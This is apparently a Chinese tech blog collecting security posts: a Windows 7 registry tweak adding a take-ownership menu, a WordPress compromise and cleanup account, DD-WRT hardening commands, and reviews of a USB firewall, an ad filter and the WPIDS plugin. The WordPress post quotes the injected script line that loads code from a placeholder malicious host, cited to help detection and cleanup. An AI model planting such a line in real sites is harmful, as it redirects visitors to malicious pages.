许多文件没有足够的权限是无法删除的, Windows 7给予我们的管理员权限也不是最有权力的一个管理账户, 如果连一个文件都无法访问或者修改删除, 管理员帐号也就没有什么意义.

EI曾经介绍的: 无System权限解决方案, 具备System权限的CMD 是其中一个解决方法, 但是CMD实现的方法比较麻烦, 因为不是每一个人都能熟练的使用DOS命令.

我们很可以用另外的方法实现同样的效果, 而且更为简单, 就是使用注册表添加一个右键菜单, 通过右键点击来选择是否获取Windows 7文件的管理权限, 非常方便可靠.

具体方法:

打开记事本, 粘贴下面的添加获取文件管理权限的注册表代码:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas]
  @="Take Ownership"
  "NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\*\shell\runas\command]
  @="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
  "IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
  @="Take Ownership"
  "NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
  @="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
  "IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

保存为"添加右键管理权限获取.reg"或者其他".reg"文件即可, 注意保存的后缀名为reg格式而不是txt.

如果需要删除这个右键菜单, 只需要那上面的添加的注册表去除即可, 和添加的方式一样, 用代码实现, 打开记事本, 添加:

Windows Registry Editor Version 5.00

[-HKEY_CLASSES_ROOT\*\shell\runas]

[-HKEY_CLASSES_ROOT\Directory\shell\runas]

同样保存为reg格式文件即可, 文件名随意.

添加和删除都是可以双击上面的文件, 导入到注册表就可以了, 添加和删除都非常简单干净, 没有其他多余的残留文件.

如果不知道如何保存注册表文件, 也可以下载EI已经制作好的reg文件, 文件的内容同上面代码一致.

点击这里下载添加和取消Windows 7右键权限的注册表文件

解压密码: ei2u

因为发现不同的bug, WordPress发布了许多针对安全的版本更新, 旧版Wordpress遭到黑客攻击的可能性非常大, 所以许多使用Wordpress的博主都会选择更新到官方发布的最新版本.

但是最新版本一定安全吗? 答案是No!

EI使用的Wordpress网站不久前就被黑客光顾过一次.

EI的Wordpress已经是最新版, 在主机的php5.ini和.htaccess文件上也做了简单的防护, 单纯从网站的header上无法知道主机的php版本信息和导航主机上的文件, WordPress主要的设置文件都在.htaccess文件上做了安全工作, WordPress新版中可能泄露的版本信息也已经全部屏蔽, 登录用的是大小写字母, 数字和符号的混合性登录密码. 主机上传文件也只是用普通的FTP, WordPress的部分文件路径也是自定义过的.

虽然基本的安全措施都做到了, 可以让黑客多花点时间和功夫, 但是主机上的所有PHP文件还是让黑客加上了连接到恶意网站的代码, 数据库完好无缺. 黑客的手法很卑劣, 所有PHP文件头部都加上了反编译加密过的PHP代码, 代码主要在网站的尾部加上

<script src="http://恶意网址.com/oo.php"></script>

在网站完全加载之后将会跳转到一个恶意网站上, 只要Wordpress启用的主题或者插件的任何PHP文件上包含这些代码都会在页面尾部添加这一小段, 只看源文件很隐蔽, 网址也不是特别显眼.

要找出Wordpress是否已经被黑过, 用FTP登录时可以看到所有文件的最后修改日期和时间, 一般Wordpress除了升级之后核心等文件都不会有变化, 也就是日期和时间都会显示在升级的那个时间上. 如果你的Wordpress更新时间和你看到的日期和时间都不一样, 那就要看一下文件是否已经被修改了.

Linux主机首先要查看主机根目录下的.htaccess文件是否有被修改.

一般黑客都会将代码加密后加入到文件之中, 所以我们可以看看是否有加密过的PHP代码来判断.

如果很不幸, PHP文件的修改日期都显示为某一可疑的日期和时间, 检查一些文件发现所有主机上的PHP文件和EI的情况一样, PHP文件的头部都已经被黑客批量修改了, 表示Wordpress已经遭到黑客的入侵了.

发现已经被黑, 第一件事情就是修改密码了, 既然可以在PHP文件上动手脚, Mysql的密码也是唾手可得, 将主机登录的密码, Mysql密码, WordPress密码均需要修改, 检查Wordpress的帐号是否有隐藏帐号, 自己登录帐号的资料是否包含其他脚本.

密码搞定之后就是修复工作就开始了, 登录Wordpress (如果黑客没有破坏Wordpress, 只是在Wordpress挂马的话), 点击升级, 因为是最新版本, 所以我们可以选择重新安装最新版本Wordpress. 升级之后, 剩下的被修改过的文件不多了, wp-config.php等文件不受升级影响, 所以我们要手动删除插入的代码, 加密过的PHP代码很容易区分, WordPress的原PHP文件是没有经过任何加密.

用重新安装的方法恢复Wordpress程序文件之后, 插件和主题也是需要我们手动清理的, 我们可以将插件删除了在安装即可, 主题就重新上传吧, 相信用Wordpress的都有自己修改主题, 所以都应该有主题的备份.

最后就是重新导入之前备份过的数据库了, 当然, 如果确认过数据库并没有遭到入侵, 可以忽略.

全部搞定之后就刷新自己的网站, 看看源代码中是否还包含恶意代码, 如果已经干净了, 恢复工作也就完成了.

因为不确定是否为Wordpress最新版未发现的bug所导致被入侵, 查看主机的日志, 看文件遭到批量修改的时间主机上有哪些IP在请求什么文件, 必要时可以用htaccess封掉一些非法请求的IP.

EI建议同时可以安装插件来协助防御, 避免下次重蹈覆辙, 可浏览

WPIDS – PHPIDS 为Wordpress提供入侵防御

此外, 还需要经常备份数据库和主机上的文件以备不时之需.

其实路由器的防火墙看似简单, 没多大功能, 其实就算最简单的几项都可以让网络更加安全, 何况DD-WRT内置iptables防火墙, 可以设置定制出非常严厉的的防火墙规则.

但是iptables规则对一般人来说并不简单, 而且几乎每台PC上都已经安装了个人防火墙, 所以路由上的防火墙主要用来防护一些比较容易可能影响到网络的威胁即可, 这样一来就不会太过于影响路由器的性能, 毕竟DD-WRT的防火墙也会消耗路由器的CPU和内存.

我们可以用简单的脚本命令来实现DD-WRT上的DoS保护, 过载保护, 中间人攻击(MITMA, man in the middle attack), PING攻击等主要的防火墙功能, 这些不需要任何特定参数和IP规则, 对于家庭网络的保护最好不过了.

命令部分来之DDWRT官方Wiki, 点击查看

符号"#"后的内容为注释, 实际使用时可以把"#"后面的内容整句删除.

复制下面的命令, 粘贴到DD-WRT的启动命令上即可.

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
  echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
  echo 1 > /proc/sys/net/ipv4/ip_forward

# 下面两个注释掉的参数会影响eMule等软件, 请自行调试后决定是否开启.
  #echo 1024 > /proc/sys/net/ipv4/ipfrag_high_thresh
  #echo 512 > /proc/sys/net/ipv4/ipfrag_low_thresh 
  echo 64000 > /proc/sys/net/ipv4/ipfrag_high_thresh
  echo 48000 > /proc/sys/net/ipv4/ipfrag_low_thresh 

echo 10 > /proc/sys/net/ipv4/ipfrag_time 
  echo 5 > /proc/sys/net/ipv4/icmp_ratelimit
  echo 1 > /proc/sys/net/ipv4/tcp_syncookies
  echo 0 > /proc/sys/net/ipv4/conf/eth1/accept_source_route
  echo 0 > /proc/sys/net/ipv4/conf/eth1/accept_redirects 
  echo 1 > /proc/sys/net/ipv4/conf/eth1/log_martians 
  echo 10 > /proc/sys/net/ipv4/neigh/eth1/locktime
  echo 0 > /proc/sys/net/ipv4/conf/eth1/proxy_arp
  echo 50 > /proc/sys/net/ipv4/neigh/eth1/gc_stale_time

#
  # 下面的命令确保提供最后保护和对于"中间人"MITM攻击提供适当的防御
  # 

echo 0 > /proc/sys/net/ipv4/conf/eth1/send_redirects
  echo 0 > /proc/sys/net/ipv4/conf/eth1/secure_redirects
  echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
  echo 5 > /proc/sys/net/ipv4/igmp_max_memberships
  echo 2 > /proc/sys/net/ipv4/igmp_max_msf
  echo 1024 > /proc/sys/net/ipv4/tcp_max_orphans
  echo 2 > /proc/sys/net/ipv4/tcp_syn_retries
  echo 2 > /proc/sys/net/ipv4/tcp_synack_retries
  echo 1 > /proc/sys/net/ipv4/tcp_abort_on_overflow
  echo 10 > /proc/sys/net/ipv4/tcp_fin_timeout
  echo 0 > /proc/sys/net/ipv4/route/redirect_number
  echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter
  echo 1 > /proc/sys/net/ipv4/conf/eth1/rp_filter
  echo 1 > /proc/sys/net/ipv4/tcp_syncookies
  echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route
  echo 61 > /proc/sys/net/ipv4/ip_default_ttl

# 调整超时防御DoS攻击
  echo "1800" > /proc/sys/net/ipv4/tcp_keepalive_time
  echo "0" > /proc/sys/net/ipv4/tcp_window_scaling
  echo "0" > /proc/sys/net/ipv4/tcp_sack

# 类似Windows XP的包检查防火墙功能
  echo 4096 87380 4194304 >/proc/sys/net/ipv4/tcp_rmem
  echo 4096 87380 4194304 >/proc/sys/net/ipv4/tcp_wmem

# 检查网络超载 (详细的拥堵通知)
  echo 1 > /proc/sys/net/ipv4/tcp_ecn

# 修改外出流量的端口范围
  echo "30000 60000" > /proc/sys/net/ipv4/ip_local_port_range

EI测试DD-WRT Wiki原代码中的LED提示指示没有成功, 原代码上的一些可有可无的命令已经去除.

直接添加到DD-WRT启动命令后路由应该会自动重启, 测试是否成功的最简单方式就是直接Ping路由的IP地址, 返回的是超时或者无法连接就表示已经成功.

EI2U拿到的Yoggie Gatekeeper是包含一年订阅升级的, 同时可以申请加两年的免费订阅升级特征库的服务, 购买价是65美金外加3年的订阅可以说是比较值得的, 毕竟活动过后两年的订阅费可以够EI2U买多一个新的Yoggie了.

Yoggie Pico USB包含的内容有反病毒, 反垃圾邮件, 反网络钓鱼, 入侵检测, 入侵预防, 防火墙(状态检查), Web 过滤, 家长内容控制, Adaptive Security Policy, Multi-Layer Security Agent, 8层安全引擎.

Yoggie内置的是Linux系统, 使用的Intel PXA270处理器, 作为个人版的硬件防火墙的参数看起来还是可以的.

驱动Yoggie很简单, 只需要插入USB然后安装Yoggie的控制台即可, Yoggie安装的时候会提示是否安装Kaspersky, Yoggie的包装上已经有Kaspersky杀毒一年的订阅码, 可以说是很超值.

纯英文的控制界面, 直观, 操作上也非常简单, 能单独对IPS, 后门, 间谍扫描, 病毒, 恶意网址, DNS等进行操控. 安装了Yoggie后电脑的所有流量都会经过Yoggie.

硬件防火墙的作用就是比软件防火墙有更高的负载和防御, 能够在不消耗主机资源的情况下运行任何防御. Yoggie上的指示灯在有警告的时候会闪烁, 非常漂亮.

EI2U测试Yoggie时发现Yoggie的扫描效果非常不错, 打开有病毒的网站时会显示Yoggie的隔离页面, 直接下载带毒的附件时同样过不了Yoggie的病毒扫描. 打开广告过滤时, 能过滤80%以上的页面广告, 替代的是Yoggie的图标, 效果很理想.

防火墙方面由于阻断访问的效果和EI使用网络上的Linux防火墙的控制所以不能进行很完善的测试, 估计应该比软件防火墙要好.

然而, Yoggie对于使用下载工具下载的文件却无能为力, 可能是下载工具使用多线程和分段下载所以难以扫描. EI2U发现一个比较大的问题就是速度问题, 使用Yoggie后网速可以感受到明显的下降, 毕竟USB的速度和效率有限.

尽管速度方面表现一般, 但是Yoggie确实没有占用主机的任何资源, 控制台只是方便用户查看监控数据和管理.

速度影响最明显的就是直接打开比较大的文件时, 会导致Yoggie内置的Linux无反应, 需要重新拔插后才能正常使用, 这个问题是导致EI2U放弃这款Yoggie的主要原因.

网上许多号称广告过滤的免费软件或者插件, 本身就类似一个恶意软件, 强行安装了工具栏或者其他类似的难以卸载的功能, 效果也没有广告中那么好.

金山网盾是一款小巧精悍的web防护软件, 永久免费, 系统资源占用很少, 能够支持IE, Firefox, Safari, Opera, Chrome等主流浏览器, 甚至使用IE内核的国内浏览器也在支持的范围之内, 闪游, 糖果, IQ, 搜狗, 傲游, 世界之窗等浏览器通通支持, 设置页面上还可以添加未支持的浏览器到保护之中, 可见金山网盾考虑的还是挺周到的, 毕竟现在浏览器的推出是越来越多.

网盾的官方地址

网络防护是金山网盾的主推功能, 不说当中的防护效果有多出众, 想必很多人和Ei2U一样, 看中的是当中的网页净化功能吧. 在3.0版本以后的金山网盾就包含这个功能, 用户可以自行设置网站的过滤类型, 像目前的广告站, 垃圾站还有带毒的网站都可以将其设置在净化列表之内.

除了Adblock, Opera, Safari和IE等浏览器上严格上都没有什么像样的广告过滤插件. 现在用金山网盾的网页净化我们也可以达到差不多的效果了.

安装完成后唯一需要的就是过滤规则了, 网上有许多人已经根据火狐的Adblock插件的规则写出了适用于金山网盾的网页净化规则, EI推荐使用的是卡饭论坛上一位网友放出的规则.

规则下载 转自卡饭
得到规则后导入金山网盾就可以使用了, 需要重新打开浏览器才正式生效. 如果有一些还没有过滤完全的, 我们也可以自己添加进去, 非常方便.

网盾的升级版已经自带规则更新功能, 可以自行订阅需要的过滤规则.

WPIDS移植至PHPIDS（PHP的入侵检测系统), PHPIDS是一款简单, 快速, 高效的PHP入侵防护应用, WPIDS成功的将其功能移植至Wordpress下, 使其为Wordpress提供入侵防御功能.

攻击多数具有针对性, 攻击者会寻找Wordpress可能存在或者已经存在的弱点或者Bug来突破.

使用WPIDS后, 恶意链接的任何请求都将被记录到数据库中以备日后分析, 也可以设置电子邮件通知.
后台页面也会有相关提示, 还有安全数据库的更新等, 该插件还可以一定程度上阻挡恶意spam的攻击.
已经在在Wordpress现行版本中测试, 完美运行.

Download this file

将在新的版本添加的功能:

显示阻挡提示攻击者
更好的浏览器和攻击分析
旧数据库清理

下载最新的安全规则和变换器(下面链接将会一直更新):

default_filter.xml

Converter.php

安全规则和变化器需要手动更新, 一般安全规则在一两天就会更新一次, 经常更新才可以抵御最新入侵.

点击打开插件发布页面